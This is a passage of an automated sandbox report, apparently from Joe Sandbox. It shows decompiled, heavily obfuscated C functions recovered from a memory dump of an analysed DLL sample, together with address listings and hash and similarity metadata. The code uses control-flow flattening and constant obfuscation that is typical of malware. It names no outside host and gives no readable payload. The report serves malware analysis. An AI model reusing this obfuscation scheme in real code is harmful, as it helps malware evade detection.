                                                                                                                                                                            				_v628 = _v628 ^ 0x0529ff2d;
                                                                                                                                                                            				_v628 = _v628 ^ 0x052de72a;
                                                                                                                                                                            				_v664 = 0x989cfa;
                                                                                                                                                                            				_v664 = _v664 * 0x6a;
                                                                                                                                                                            				_v664 = _v664 | 0x8da787ac;
                                                                                                                                                                            				_v664 = _v664 + 0xffffc08b;
                                                                                                                                                                            				_v664 = _v664 ^ 0xbfb72d66;
                                                                                                                                                                            				_v672 = 0x5126c1;
                                                                                                                                                                            				_v672 = _v672 << 0xa;
                                                                                                                                                                            				_v672 = _v672 | 0x6300e881;
                                                                                                                                                                            				_v672 = _v672 * 0x1d;
                                                                                                                                                                            				_v672 = _v672 ^ 0xbca67a4e;
                                                                                                                                                                            				_v636 = 0x3defe6;
                                                                                                                                                                            				_t49 =  &_v636; // 0x3defe6
                                                                                                                                                                            				_v636 =  *_t49 * 9;
                                                                                                                                                                            				_t51 =  &_v636; // 0x3defe6
                                                                                                                                                                            				_v636 =  *_t51 * 0x52;
                                                                                                                                                                            				_v636 = _v636 ^ 0xb28641ab;
                                                                                                                                                                            				_v632 = 0xea2077;
                                                                                                                                                                            				_t56 =  &_v632; // 0xea2077
                                                                                                                                                                            				_v632 =  *_t56 * 0x65;
                                                                                                                                                                            				_v632 = _v632 << 2;
                                                                                                                                                                            				_v632 = _v632 ^ 0x7174f9be;
                                                                                                                                                                            				_v660 = 0x2cce37;
                                                                                                                                                                            				_v660 = _v660 << 0xd;
                                                                                                                                                                            				_v660 = _v660 / _t241;
                                                                                                                                                                            				_v660 = _v660 << 4;
                                                                                                                                                                            				_v660 = _v660 ^ 0x1917ca80;
                                                                                                                                                                            				_v676 = 0x92ca3e;
                                                                                                                                                                            				_t242 = 0x12;
                                                                                                                                                                            				_v676 = _v676 * 0x4b;
                                                                                                                                                                            				_v676 = _v676 << 0xf;
                                                                                                                                                                            				_v676 = _v676 >> 2;
                                                                                                                                                                            				_v676 = _v676 ^ 0x28034127;
                                                                                                                                                                            				_v596 = 0xf7772a;
                                                                                                                                                                            				_v596 = _v596 + 0xffff3df8;
                                                                                                                                                                            				_v596 = _v596 ^ 0x00fc52ab;
                                                                                                                                                                            				_v644 = 0x6698d1;
                                                                                                                                                                            				_v644 = _v644 | 0xc199dbe0;
                                                                                                                                                                            				_v644 = _v644 ^ 0xc1fcc133;
                                                                                                                                                                            				_v592 = 0x7143e7;
                                                                                                                                                                            				_v592 = _v592 >> 2;
                                                                                                                                                                            				_v592 = _v592 ^ 0x0010b3e1;
                                                                                                                                                                            				_v652 = 0x9a4189;
                                                                                                                                                                            				_v652 = _v652 * 0x60;
                                                                                                                                                                            				_v652 = _v652 / _t242;
                                                                                                                                                                            				_v652 = _v652 ^ 0x033cbda1;
                                                                                                                                                                            				_v668 = 0xc5fab;
                                                                                                                                                                            				_v668 = _v668 << 0xb;
                                                                                                                                                                            				_v668 = _v668 >> 9;
                                                                                                                                                                            				_v668 = _v668 + 0x8f67;
                                                                                                                                                                            				_v668 = _v668 ^ 0x0031c4ff;
                                                                                                                                                                            				_v600 = 0x6e8ee8;
                                                                                                                                                                            				_v600 = _v600 ^ 0x0d880c60;
                                                                                                                                                                            				_v600 = _v600 ^ 0x0deba949;
                                                                                                                                                                            				_v616 = 0xb65c97;
                                                                                                                                                                            				_v616 = _v616 + 0xffff6050;
                                                                                                                                                                            				_v616 = _v616 << 6;
                                                                                                                                                                            				_v616 = _v616 ^ 0x2d666d98;
                                                                                                                                                                            				_v640 = 0xcc6d21;
                                                                                                                                                                            				_t243 = 0x1b;
                                                                                                                                                                            				_v640 = _v640 / _t243;
                                                                                                                                                                            				_v640 = _v640 >> 0xe;
                                                                                                                                                                            				_v640 = _v640 ^ 0x000eaea1;
                                                                                                                                                                            				_v680 = 0x87d5f6;
                                                                                                                                                                            				_t244 = 0x76;
                                                                                                                                                                            				_v680 = _v680 * 0x1f;
                                                                                                                                                                            				_v680 = _v680 << 9;
                                                                                                                                                                            				_v680 = _v680 + 0xffff990b;
                                                                                                                                                                            				_v680 = _v680 ^ 0xe5dd4258;
                                                                                                                                                                            				_v608 = 0xe96961;
                                                                                                                                                                            				_v608 = _v608 | 0xb6f9188e;
                                                                                                                                                                            				_v608 = _v608 ^ 0xb6fb8930;
                                                                                                                                                                            				_v656 = 0xc61929;
                                                                                                                                                                            				_v656 = _v656 >> 2;
                                                                                                                                                                            				_v656 = _v656 + 0xcacc;
                                                                                                                                                                            				_v656 = _v656 << 2;
                                                                                                                                                                            				_v656 = _v656 ^ 0x00c38b27;
                                                                                                                                                                            				_v648 = 0x21afdf;
                                                                                                                                                                            				_v648 = _v648 + 0x614;
                                                                                                                                                                            				_v648 = _v648 + 0x692f;
                                                                                                                                                                            				_v648 = _v648 ^ 0x002627a2;
                                                                                                                                                                            				_v620 = 0xc6d0;
                                                                                                                                                                            				_v620 = _v620 + 0xee3f;
                                                                                                                                                                            				_t240 = _v608;
                                                                                                                                                                            				_v620 = _v620 / _t244;
                                                                                                                                                                            				_v620 = _v620 ^ 0x0005d3ba;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t261 != 0x885c2e) {
                                                                                                                                                                            						if(_t261 == 0x1fa5b7d) {
                                                                                                                                                                            							_t244 = _v628;
                                                                                                                                                                            							_t233 = E02F70DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
                                                                                                                                                                            							_t268 = _t268 + 0xc;
                                                                                                                                                                            							__eflags = _t233;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								_t261 = 0x6c35f0b;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t261 == 0x4edc737) {
                                                                                                                                                                            								_push(_t244);
                                                                                                                                                                            								_t236 = E02F6DBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
                                                                                                                                                                            								_t258 = _v680;
                                                                                                                                                                            								_t244 = _v640;
                                                                                                                                                                            								asm("sbb esi, esi");
                                                                                                                                                                            								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
                                                                                                                                                                            								E02F71538(_t244, _t258, _t240);
                                                                                                                                                                            								_t268 = _t268 + 0x1c;
                                                                                                                                                                            								goto L14;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t261 == 0x6c35f0b) {
                                                                                                                                                                            									_t258 = _v636;
                                                                                                                                                                            									_t244 =  &_v524;
                                                                                                                                                                            									_t238 = E02F745CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
                                                                                                                                                                            									_t240 = _t238;
                                                                                                                                                                            									_t268 = _t268 + 0x30;
                                                                                                                                                                            									__eflags = _t238 - 0xffffffff;
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										_t261 = 0x4edc737;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t261 == 0x8f2e6fb) {
                                                                                                                                                                            										_t239 = E02F55477(_t244);
                                                                                                                                                                            										_t266 = _v588 - _v548;
                                                                                                                                                                            										asm("sbb ecx, [esp+0x9c]");
                                                                                                                                                                            										__eflags = _v584 - _t258;
                                                                                                                                                                            										if(__eflags >= 0) {
                                                                                                                                                                            											if(__eflags > 0) {
                                                                                                                                                                            												L19:
                                                                                                                                                                            												_t259 = 1;
                                                                                                                                                                            												__eflags = 1;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eflags = _t266 - _t239;
                                                                                                                                                                            												if(_t266 >= _t239) {
                                                                                                                                                                            													goto L19;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t261 != 0xb8e9ee3) {
                                                                                                                                                                            											goto L14;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t261 = 0x1fa5b7d;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L20:
                                                                                                                                                                            						return _t259;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t244 = _v608;
                                                                                                                                                                            					E02F6CA1F(_t244, _v656,  &_v588, _v648, _v620);
                                                                                                                                                                            					_t268 = _t268 + 0xc;
                                                                                                                                                                            					_t261 = 0x8f2e6fb;
                                                                                                                                                                            					L14:
                                                                                                                                                                            					__eflags = _t261 - 0x203d9a3;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				goto L20;
                                                                                                                                                                            			}















































                                                                                                                                                                            0x02f56711
                                                                                                                                                                            0x02f5671b
                                                                                                                                                                            0x02f56727
                                                                                                                                                                            0x02f56729
                                                                                                                                                                            0x02f5672e
                                                                                                                                                                            0x02f56735
                                                                                                                                                                            0x02f5673d
                                                                                                                                                                            0x02f56744
                                                                                                                                                                            0x02f56747
                                                                                                                                                                            0x02f5674b
                                                                                                                                                                            0x02f56753
                                                                                                                                                                            0x02f5675b
                                                                                                                                                                            0x02f56763
                                                                                                                                                                            0x02f56768
                                                                                                                                                                            0x02f56770
                                                                                                                                                                            0x02f56778
                                                                                                                                                                            0x02f56780
                                                                                                                                                                            0x02f56785
                                                                                                                                                                            0x02f5678d
                                                                                                                                                                            0x02f56795
                                                                                                                                                                            0x02f5679a
                                                                                                                                                                            0x02f567a2
                                                                                                                                                                            0x02f567aa
                                                                                                                                                                            0x02f567b7
                                                                                                                                                                            0x02f567bb
                                                                                                                                                                            0x02f567c3
                                                                                                                                                                            0x02f567cb
                                                                                                                                                                            0x02f567d3
                                                                                                                                                                            0x02f567db
                                                                                                                                                                            0x02f567e0
                                                                                                                                                                            0x02f567ed
                                                                                                                                                                            0x02f567f1
                                                                                                                                                                            0x02f567f9
                                                                                                                                                                            0x02f56801
                                                                                                                                                                            0x02f56806
                                                                                                                                                                            0x02f5680a
                                                                                                                                                                            0x02f5680f
                                                                                                                                                                            0x02f56813
                                                                                                                                                                            0x02f5681b
                                                                                                                                                                            0x02f56823
                                                                                                                                                                            0x02f56828
                                                                                                                                                                            0x02f5682c
                                                                                                                                                                            0x02f56831
                                                                                                                                                                            0x02f56839
                                                                                                                                                                            0x02f56841
                                                                                                                                                                            0x02f5684e
                                                                                                                                                                            0x02f56852
                                                                                                                                                                            0x02f56857
                                                                                                                                                                            0x02f5685f
                                                                                                                                                                            0x02f5686c
                                                                                                                                                                            0x02f5686d
                                                                                                                                                                            0x02f56871
                                                                                                                                                                            0x02f56876
                                                                                                                                                                            0x02f5687b
                                                                                                                                                                            0x02f56883
                                                                                                                                                                            0x02f5688b
                                                                                                                                                                            0x02f56893
                                                                                                                                                                            0x02f5689b
                                                                                                                                                                            0x02f568a3
                                                                                                                                                                            0x02f568ab
                                                                                                                                                                            0x02f568b3
                                                                                                                                                                            0x02f568bb
                                                                                                                                                                            0x02f568c0
                                                                                                                                                                            0x02f568c8
                                                                                                                                                                            0x02f568d5
                                                                                                                                                                            0x02f568df
                                                                                                                                                                            0x02f568e5
                                                                                                                                                                            0x02f568f2
                                                                                                                                                                            0x02f568fa
                                                                                                                                                                            0x02f568ff
                                                                                                                                                                            0x02f56904
                                                                                                                                                                            0x02f5690c
                                                                                                                                                                            0x02f56914
                                                                                                                                                                            0x02f5691c
                                                                                                                                                                            0x02f56924
                                                                                                                                                                            0x02f5692c
                                                                                                                                                                            0x02f56934
                                                                                                                                                                            0x02f5693c
                                                                                                                                                                            0x02f56941
                                                                                                                                                                            0x02f56949
                                                                                                                                                                            0x02f56957
                                                                                                                                                                            0x02f5695c
                                                                                                                                                                            0x02f56962
                                                                                                                                                                            0x02f56967
                                                                                                                                                                            0x02f5696f
                                                                                                                                                                            0x02f5697c
                                                                                                                                                                            0x02f5697d
                                                                                                                                                                            0x02f56981
                                                                                                                                                                            0x02f56986
                                                                                                                                                                            0x02f5698e
                                                                                                                                                                            0x02f56996
                                                                                                                                                                            0x02f5699e
                                                                                                                                                                            0x02f569a6
                                                                                                                                                                            0x02f569ae
                                                                                                                                                                            0x02f569b6
                                                                                                                                                                            0x02f569bb
                                                                                                                                                                            0x02f569c3
                                                                                                                                                                            0x02f569c8
                                                                                                                                                                            0x02f569d0
                                                                                                                                                                            0x02f569d8
                                                                                                                                                                            0x02f569e0
                                                                                                                                                                            0x02f569e8
                                                                                                                                                                            0x02f569f0
                                                                                                                                                                            0x02f569f8
                                                                                                                                                                            0x02f56a06
                                                                                                                                                                            0x02f56a0a
                                                                                                                                                                            0x02f56a0e
                                                                                                                                                                            0x02f56a16
                                                                                                                                                                            0x02f56a16
                                                                                                                                                                            0x02f56a24
                                                                                                                                                                            0x02f56afb
                                                                                                                                                                            0x02f56aff
                                                                                                                                                                            0x02f56b04
                                                                                                                                                                            0x02f56b07
                                                                                                                                                                            0x02f56b09
                                                                                                                                                                            0x02f56b0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56b0b
                                                                                                                                                                            0x02f56a2a
                                                                                                                                                                            0x02f56a30
                                                                                                                                                                            0x02f56aa5
                                                                                                                                                                            0x02f56ac1
                                                                                                                                                                            0x02f56ac6
                                                                                                                                                                            0x02f56acc
                                                                                                                                                                            0x02f56ad3
                                                                                                                                                                            0x02f56adb
                                                                                                                                                                            0x02f56ae1
                                                                                                                                                                            0x02f56ae6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56a32
                                                                                                                                                                            0x02f56a38
                                                                                                                                                                            0x02f56a7b
                                                                                                                                                                            0x02f56a81
                                                                                                                                                                            0x02f56a88
                                                                                                                                                                            0x02f56a8d
                                                                                                                                                                            0x02f56a8f
                                                                                                                                                                            0x02f56a92
                                                                                                                                                                            0x02f56a95
                                                                                                                                                                            0x02f56a9b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56a9b
                                                                                                                                                                            0x02f56a3a
                                                                                                                                                                            0x02f56a40
                                                                                                                                                                            0x02f56b45
                                                                                                                                                                            0x02f56b4e
                                                                                                                                                                            0x02f56b59
                                                                                                                                                                            0x02f56b60
                                                                                                                                                                            0x02f56b62
                                                                                                                                                                            0x02f56b64
                                                                                                                                                                            0x02f56b6a
                                                                                                                                                                            0x02f56b6c
                                                                                                                                                                            0x02f56b6c
                                                                                                                                                                            0x02f56b66
                                                                                                                                                                            0x02f56b66
                                                                                                                                                                            0x02f56b68
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56b68
                                                                                                                                                                            0x02f56b64
                                                                                                                                                                            0x02f56a46
                                                                                                                                                                            0x02f56a4c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56a52
                                                                                                                                                                            0x02f56a52
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56a52
                                                                                                                                                                            0x02f56a4c
                                                                                                                                                                            0x02f56a40
                                                                                                                                                                            0x02f56a38
                                                                                                                                                                            0x02f56a30
                                                                                                                                                                            0x02f56b6d
                                                                                                                                                                            0x02f56b79
                                                                                                                                                                            0x02f56b79
                                                                                                                                                                            0x02f56b25
                                                                                                                                                                            0x02f56b2a
                                                                                                                                                                            0x02f56b2f
                                                                                                                                                                            0x02f56b32
                                                                                                                                                                            0x02f56b37
                                                                                                                                                                            0x02f56b37
                                                                                                                                                                            0x02f56b37
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: /i$?$ai$w $:$Cq$=
                                                                                                                                                                            • API String ID: 0-170593755
                                                                                                                                                                            • Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
                                                                                                                                                                            • Instruction ID: 731cc1579b52893f6e32df2203fe49b82ac0858ecae1487a8ed53028a142e787
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
                                                                                                                                                                            • Instruction Fuzzy Hash: F1B123729083909FC368CF65C58950BFBE5BBC5788F108A1DFAE996220D3B59949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E02F64A66() {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				intOrPtr _v524;
                                                                                                                                                                            				intOrPtr _v528;
                                                                                                                                                                            				intOrPtr _v532;
                                                                                                                                                                            				signed int _v536;
                                                                                                                                                                            				signed int _v540;
                                                                                                                                                                            				signed int _v544;
                                                                                                                                                                            				signed int _v548;
                                                                                                                                                                            				signed int _v552;
                                                                                                                                                                            				signed int _v556;
                                                                                                                                                                            				signed int _v560;
                                                                                                                                                                            				signed int _v564;
                                                                                                                                                                            				signed int _v568;
                                                                                                                                                                            				signed int _v572;
                                                                                                                                                                            				signed int _v576;
                                                                                                                                                                            				signed int _v580;
                                                                                                                                                                            				signed int _v584;
                                                                                                                                                                            				signed int _v588;
                                                                                                                                                                            				signed int _v592;
                                                                                                                                                                            				signed int _v596;
                                                                                                                                                                            				signed int _v600;
                                                                                                                                                                            				signed int _v604;
                                                                                                                                                                            				signed int _v608;
                                                                                                                                                                            				signed int _v612;
                                                                                                                                                                            				signed int _v616;
                                                                                                                                                                            				signed int _v620;
                                                                                                                                                                            				signed int _v624;
                                                                                                                                                                            				signed int _v628;
                                                                                                                                                                            				signed int _v632;
                                                                                                                                                                            				signed int _v636;
                                                                                                                                                                            				signed int _v640;
                                                                                                                                                                            				void* _t271;
                                                                                                                                                                            				void* _t272;
                                                                                                                                                                            				intOrPtr _t277;
                                                                                                                                                                            				intOrPtr _t283;
                                                                                                                                                                            				signed int _t285;
                                                                                                                                                                            				intOrPtr _t287;
                                                                                                                                                                            				void* _t289;
                                                                                                                                                                            				intOrPtr _t294;
                                                                                                                                                                            				intOrPtr _t311;
                                                                                                                                                                            				signed int _t317;
                                                                                                                                                                            				signed int _t318;
                                                                                                                                                                            				signed int _t319;
                                                                                                                                                                            				signed int _t320;
                                                                                                                                                                            				signed int _t321;
                                                                                                                                                                            				signed int _t322;
                                                                                                                                                                            				signed int _t323;
                                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                                            				signed int* _t327;
                                                                                                                                                                            				void* _t330;
                                                                                                                                                                            
                                                                                                                                                                            				_t327 =  &_v640;
                                                                                                                                                                            				_v532 = 0x9eda53;
                                                                                                                                                                            				_v528 = 0x2697e4;
                                                                                                                                                                            				_t289 = 0xd8634eb;
                                                                                                                                                                            				_t325 = 0;
                                                                                                                                                                            				_v524 = 0;
                                                                                                                                                                            				_v580 = 0x257a8f;
                                                                                                                                                                            				_v580 = _v580 + 0xffff0a69;
                                                                                                                                                                            				_t317 = 0x46;
                                                                                                                                                                            				_v580 = _v580 / _t317;
                                                                                                                                                                            				_v580 = _v580 ^ 0x00008592;
                                                                                                                                                                            				_v556 = 0x213626;
                                                                                                                                                                            				_t16 =  &_v556; // 0x213626
                                                                                                                                                                            				_t318 = 0x3f;
                                                                                                                                                                            				_v556 =  *_t16 * 0x37;
                                                                                                                                                                            				_v556 = _v556 ^ 0x0722a203;
                                                                                                                                                                            				_v564 = 0xc854a8;
                                                                                                                                                                            				_v564 = _v564 >> 0xd;
                                                                                                                                                                            				_v564 = _v564 ^ 0x000f067d;
                                                                                                                                                                            				_v568 = 0x3071d1;
                                                                                                                                                                            				_v568 = _v568 + 0xffff48c8;
                                                                                                                                                                            				_v568 = _v568 ^ 0x002621f6;
                                                                                                                                                                            				_v548 = 0x47fca2;
                                                                                                                                                                            				_v548 = _v548 ^ 0x7cca96d7;
                                                                                                                                                                            				_v548 = _v548 ^ 0x7c82555f;
                                                                                                                                                                            				_v624 = 0xc0bc8e;
                                                                                                                                                                            				_v624 = _v624 | 0x773eab6a;
                                                                                                                                                                            				_v624 = _v624 + 0x32c;
                                                                                                                                                                            				_v624 = _v624 + 0xe315;
                                                                                                                                                                            				_v624 = _v624 ^ 0x77fb7a9a;
                                                                                                                                                                            				_v544 = 0x592636;
                                                                                                                                                                            				_v544 = _v544 << 0xb;
                                                                                                                                                                            				_v544 = _v544 ^ 0xc9333252;
                                                                                                                                                                            				_v572 = 0x38b1a;
                                                                                                                                                                            				_v572 = _v572 ^ 0xe2d962db;
                                                                                                                                                                            				_v572 = _v572 ^ 0xe2dfc1be;
                                                                                                                                                                            				_v592 = 0x205e14;
                                                                                                                                                                            				_v592 = _v592 + 0xffffa7ef;
                                                                                                                                                                            				_v592 = _v592 + 0xffff7efd;
                                                                                                                                                                            				_v592 = _v592 ^ 0x001a340d;
                                                                                                                                                                            				_v540 = 0xa56fb;
                                                                                                                                                                            				_v540 = _v540 ^ 0x6fafefe0;
                                                                                                                                                                            				_v540 = _v540 ^ 0x6fae5e5f;
                                                                                                                                                                            				_v616 = 0x18df03;
                                                                                                                                                                            				_v616 = _v616 >> 6;
                                                                                                                                                                            				_v616 = _v616 + 0x4bd4;
                                                                                                                                                                            				_v616 = _v616 * 0xb;
                                                                                                                                                                            				_v616 = _v616 ^ 0x000ee45e;
                                                                                                                                                                            				_v632 = 0xf97e7d;
                                                                                                                                                                            				_v632 = _v632 >> 0xe;
                                                                                                                                                                            				_v632 = _v632 << 1;
                                                                                                                                                                            				_v632 = _v632 >> 8;
                                                                                                                                                                            				_v632 = _v632 ^ 0x0007c205;
                                                                                                                                                                            				_v588 = 0x1ac705;
                                                                                                                                                                            				_v588 = _v588 >> 0xe;
                                                                                                                                                                            				_v588 = _v588 | 0x5b484d5d;
                                                                                                                                                                            				_v588 = _v588 ^ 0x5b49b1bf;
                                                                                                                                                                            				_v608 = 0xcfa712;
                                                                                                                                                                            				_v608 = _v608 << 0xb;
                                                                                                                                                                            				_v608 = _v608 + 0xffff02b3;
                                                                                                                                                                            				_v608 = _v608 / _t318;
                                                                                                                                                                            				_v608 = _v608 ^ 0x01ff3be8;
                                                                                                                                                                            				_v600 = 0x40b8c7;
                                                                                                                                                                            				_v600 = _v600 >> 0xe;
                                                                                                                                                                            				_v600 = _v600 + 0xffff3f18;
                                                                                                                                                                            				_v600 = _v600 ^ 0xffff31b4;
                                                                                                                                                                            				_v560 = 0xb86873;
                                                                                                                                                                            				_v560 = _v560 * 0x79;
                                                                                                                                                                            				_v560 = _v560 ^ 0x572fdc31;
                                                                                                                                                                            				_v596 = 0x3e642a;
                                                                                                                                                                            				_t319 = 0x51;
                                                                                                                                                                            				_v596 = _v596 / _t319;
                                                                                                                                                                            				_t320 = 0x15;
                                                                                                                                                                            				_v596 = _v596 / _t320;
                                                                                                                                                                            				_v596 = _v596 ^ 0x00087e57;
                                                                                                                                                                            				_v636 = 0x2d2a20;
                                                                                                                                                                            				_t132 =  &_v636; // 0x2d2a20
                                                                                                                                                                            				_t321 = 0x64;
                                                                                                                                                                            				_v636 =  *_t132 * 0x60;
                                                                                                                                                                            				_v636 = _v636 + 0xd33d;
                                                                                                                                                                            				_v636 = _v636 << 5;
                                                                                                                                                                            				_v636 = _v636 ^ 0x1e1aa121;
                                                                                                                                                                            				_v640 = 0xb10dcc;
                                                                                                                                                                            				_v640 = _v640 | 0xc382035c;
                                                                                                                                                                            				_v640 = _v640 << 7;
                                                                                                                                                                            				_v640 = _v640 | 0x409aa621;
                                                                                                                                                                            				_v640 = _v640 ^ 0xd99a11e4;
                                                                                                                                                                            				_v584 = 0xf23298;
                                                                                                                                                                            				_v584 = _v584 / _t321;
                                                                                                                                                                            				_v584 = _v584 << 0xa;
                                                                                                                                                                            				_v584 = _v584 ^ 0x09bffa87;
                                                                                                                                                                            				_v620 = 0xffd84f;
                                                                                                                                                                            				_v620 = _v620 + 0x561c;
                                                                                                                                                                            				_v620 = _v620 + 0x86f;
                                                                                                                                                                            				_v620 = _v620 ^ 0xc18b30ac;
                                                                                                                                                                            				_v620 = _v620 ^ 0xc08b73c8;
                                                                                                                                                                            				_v628 = 0x373ddb;
                                                                                                                                                                            				_v628 = _v628 | 0x384c5e9f;
                                                                                                                                                                            				_v628 = _v628 >> 0xc;
                                                                                                                                                                            				_v628 = _v628 + 0xc32f;
                                                                                                                                                                            				_v628 = _v628 ^ 0x000038bb;
                                                                                                                                                                            				_v604 = 0xfde248;
                                                                                                                                                                            				_v604 = _v604 + 0xffff394c;
                                                                                                                                                                            				_t322 = 0x71;
                                                                                                                                                                            				_v604 = _v604 * 0xa;
                                                                                                                                                                            				_v604 = _v604 ^ 0x90dc5ac9;
                                                                                                                                                                            				_v604 = _v604 ^ 0x99310c60;
                                                                                                                                                                            				_v576 = 0xeb2acc;
                                                                                                                                                                            				_v576 = _v576 / _t322;
                                                                                                                                                                            				_v576 = _v576 >> 0xf;
                                                                                                                                                                            				_v576 = _v576 ^ 0x000b47a1;
                                                                                                                                                                            				_v612 = 0xe0e237;
                                                                                                                                                                            				_t199 =  &_v612; // 0xe0e237
                                                                                                                                                                            				_t323 = 0x22;
                                                                                                                                                                            				_v612 =  *_t199 * 0x63;
                                                                                                                                                                            				_v612 = _v612 << 0xf;
                                                                                                                                                                            				_v612 = _v612 + 0xffff9396;
                                                                                                                                                                            				_v612 = _v612 ^ 0xbdacf125;
                                                                                                                                                                            				_v552 = 0xa3e3d4;
                                                                                                                                                                            				_t324 = _v536;
                                                                                                                                                                            				_v552 = _v552 / _t323;
                                                                                                                                                                            				_v552 = _v552 ^ 0x00068221;
                                                                                                                                                                            				goto L1;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L1:
                                                                                                                                                                            						_t330 = _t289 - 0xa9836df;
                                                                                                                                                                            						if(_t330 > 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t330 == 0) {
                                                                                                                                                                            							E02F53046(_v616, _v632, _v588, _t324, _v608);
                                                                                                                                                                            							_t327 =  &(_t327[3]);
                                                                                                                                                                            							L12:
                                                                                                                                                                            							_t289 = 0xc26911c;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t289 == 0x7276a71) {
                                                                                                                                                                            							_v536 = _v580;
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t289 == 0x85778ce) {
                                                                                                                                                                            							E02F607F4();
                                                                                                                                                                            							_t289 = 0x9029ee2;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t289 == 0x9029ee2) {
                                                                                                                                                                            							E02F70DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
                                                                                                                                                                            							_t283 = E02F5EFE1(_v576, _v612, _v552,  &_v520);
                                                                                                                                                                            							_t294 =  *0x2f76214; // 0x0
                                                                                                                                                                            							 *((intOrPtr*)(_t294 + 4)) = _t283;
                                                                                                                                                                            							L23:
                                                                                                                                                                            							return _t325;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t289 != 0x9959e7d) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t285 = E02F6E8B6(_t289, _v572, _v592, _t289, _v564, _v540);
                                                                                                                                                                            						_t324 = _t285;
                                                                                                                                                                            						_t327 =  &(_t327[4]);
                                                                                                                                                                            						if(_t285 == 0) {
                                                                                                                                                                            							_t289 = 0x7276a71;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t287 =  *0x2f76214; // 0x0
                                                                                                                                                                            							 *((intOrPtr*)(_t287 + 0x20)) = 1;
                                                                                                                                                                            							_t289 = 0xdb6aac8;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t289 - 0xc26911c;
                                                                                                                                                                            					if(_t289 == 0xc26911c) {
                                                                                                                                                                            						_t311 =  *0x2f76214; // 0x0
                                                                                                                                                                            						_t271 = E02F51A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
                                                                                                                                                                            						_t327 =  &(_t327[8]);
                                                                                                                                                                            						_t289 = 0x85778ce;
                                                                                                                                                                            						__eflags = _t271;
                                                                                                                                                                            						_t272 = 1;
                                                                                                                                                                            						_t325 =  ==  ? _t272 : _t325;
                                                                                                                                                                            						goto L20;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t289 - 0xd8634eb;
                                                                                                                                                                            					if(_t289 == 0xd8634eb) {
                                                                                                                                                                            						_push(_t289);
                                                                                                                                                                            						_push(_t289);
                                                                                                                                                                            						_t277 = E02F5C5D8(0x444);
                                                                                                                                                                            						_t327 =  &(_t327[3]);
                                                                                                                                                                            						 *0x2f76214 = _t277;
                                                                                                                                                                            						_t289 = 0x9959e7d;
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t289 - 0xdb6aac8;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						goto L20;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t289 = 0xa9836df;
                                                                                                                                                                            					_v536 = _v556;
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            					L20:
                                                                                                                                                                            					__eflags = _t289 - 0xdb6d293;
                                                                                                                                                                            				} while (__eflags != 0);
